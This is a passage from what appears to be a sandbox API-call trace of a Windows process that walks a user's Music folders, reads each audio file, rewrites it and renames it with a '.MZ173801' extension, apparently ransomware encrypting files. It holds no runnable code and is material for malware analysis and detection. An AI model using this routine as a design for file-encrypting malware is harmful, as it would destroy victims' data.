lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.313] GetCurrentThreadId () returned 0x1358 [0117.313] GetCurrentThreadId () returned 0x1358 [0117.313] GetCurrentThreadId () returned 0x1358 [0117.313] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.313] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.313] GetCurrentThreadId () returned 0x1358 [0117.313] GetCurrentThreadId () returned 0x1358 [0117.313] GetCurrentThreadId () returned 0x1358 [0117.313] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\rUWxi6pNUN.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\ruwxi6pnun.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.313] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.314] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.314] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xb048 [0117.314] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.314] ReadFile (in: hFile=0x404, lpBuffer=0x2432c60, nNumberOfBytesToRead=0xb048, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0xb048, lpOverlapped=0x0) returned 1 [0117.315] CloseHandle (hObject=0x404) returned 1 [0117.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\rUWxi6pNUN.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\ruwxi6pnun.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.317] WriteFile (in: hFile=0x404, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xb048, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xb048, lpOverlapped=0x0) returned 1 [0117.318] CloseHandle (hObject=0x404) returned 1 [0117.320] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\rUWxi6pNUN.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\ruwxi6pnun.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\rUWxi6pNUN.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\ruwxi6pnun.wav.mz173801")) returned 1 [0117.321] GetCurrentThreadId () returned 0x1358 [0117.321] GetCurrentThreadId () returned 0x1358 [0117.321] GetCurrentThreadId () returned 0x1358 [0117.321] GetCurrentThreadId () returned 0x1358 [0117.321] GetCurrentThreadId () returned 0x1358 [0117.321] GetCurrentThreadId () returned 0x1358 [0117.321] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0x51bcc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x51bcc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="uO40eItURrDuO", cAlternateFileName="UO40EI~1")) returned 1 [0117.321] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0x51bcc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x51bcc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="uO40eItURrDuO", cAlternateFileName="UO40EI~1")) returned 0 [0117.321] GetLastError () returned 0x12 [0117.321] FindClose (in: hFindFile=0xa1bbd0 | out: hFindFile=0xa1bbd0) returned 1 [0117.321] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31740de0, ftCreationTime.dwHighDateTime=0x1d5ed7a, ftLastAccessTime.dwLowDateTime=0xa7346abe, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa7346abe, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bd58 [0117.322] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0117.322] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.322] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31740de0, ftCreationTime.dwHighDateTime=0x1d5ed7a, ftLastAccessTime.dwLowDateTime=0xa7346abe, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa7346abe, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.322] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.322] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.322] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa106020, ftCreationTime.dwHighDateTime=0x1d5ef35, ftLastAccessTime.dwLowDateTime=0x6e281240, ftLastAccessTime.dwHighDateTime=0x1d5e154, ftLastWriteTime.dwLowDateTime=0xa70be136, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3228, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0VlS.mp3.MZ173801", cAlternateFileName="0VLSMP~1.MZ1")) returned 1 [0117.322] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.322] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.322] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df5fc90, ftCreationTime.dwHighDateTime=0x1d5e5b1, ftLastAccessTime.dwLowDateTime=0x60396960, ftLastAccessTime.dwHighDateTime=0x1d5ee4f, ftLastWriteTime.dwLowDateTime=0xa70e4404, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4c71, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="AGpwWiEbNPs_OK mC0E.m4a.MZ173801", cAlternateFileName="AGPWWI~1.MZ1")) returned 1 [0117.322] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.322] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.322] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf121ea0, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xcaedd600, ftLastAccessTime.dwHighDateTime=0x1d5e216, ftLastWriteTime.dwLowDateTime=0xcaedd600, ftLastWriteTime.dwHighDateTime=0x1d5e216, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ATjrrwOvtU", cAlternateFileName="ATJRRW~1")) returned 1 [0117.322] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.322] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.322] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf121ea0, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xcaedd600, ftLastAccessTime.dwHighDateTime=0x1d5e216, ftLastWriteTime.dwLowDateTime=0xcaedd600, ftLastWriteTime.dwHighDateTime=0x1d5e216, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1baf0 [0117.322] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf121ea0, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xcaedd600, ftLastAccessTime.dwHighDateTime=0x1d5e216, ftLastWriteTime.dwLowDateTime=0xcaedd600, ftLastWriteTime.dwHighDateTime=0x1d5e216, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0117.323] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x367c9fa0, ftCreationTime.dwHighDateTime=0x1d5f112, ftLastAccessTime.dwLowDateTime=0xb8e19f30, ftLastAccessTime.dwHighDateTime=0x1d5e92a, ftLastWriteTime.dwLowDateTime=0xb8e19f30, ftLastWriteTime.dwHighDateTime=0x1d5e92a, nFileSizeHigh=0x0, nFileSizeLow=0xac19, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="8MMQ.m4a", cAlternateFileName="")) returned 1 [0117.323] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0117.323] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.323] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\8MMQ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\8mmq.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x367c9fa0, ftCreationTime.dwHighDateTime=0x1d5f112, ftLastAccessTime.dwLowDateTime=0xb8e19f30, ftLastAccessTime.dwHighDateTime=0x1d5e92a, ftLastWriteTime.dwLowDateTime=0xb8e19f30, ftLastWriteTime.dwHighDateTime=0x1d5e92a, nFileSizeHigh=0x0, nFileSizeLow=0xac19)) returned 1 [0117.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.324] GetCurrentThreadId () returned 0x1358 [0117.324] GetCurrentThreadId () returned 0x1358 [0117.324] GetCurrentThreadId () returned 0x1358 [0117.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, 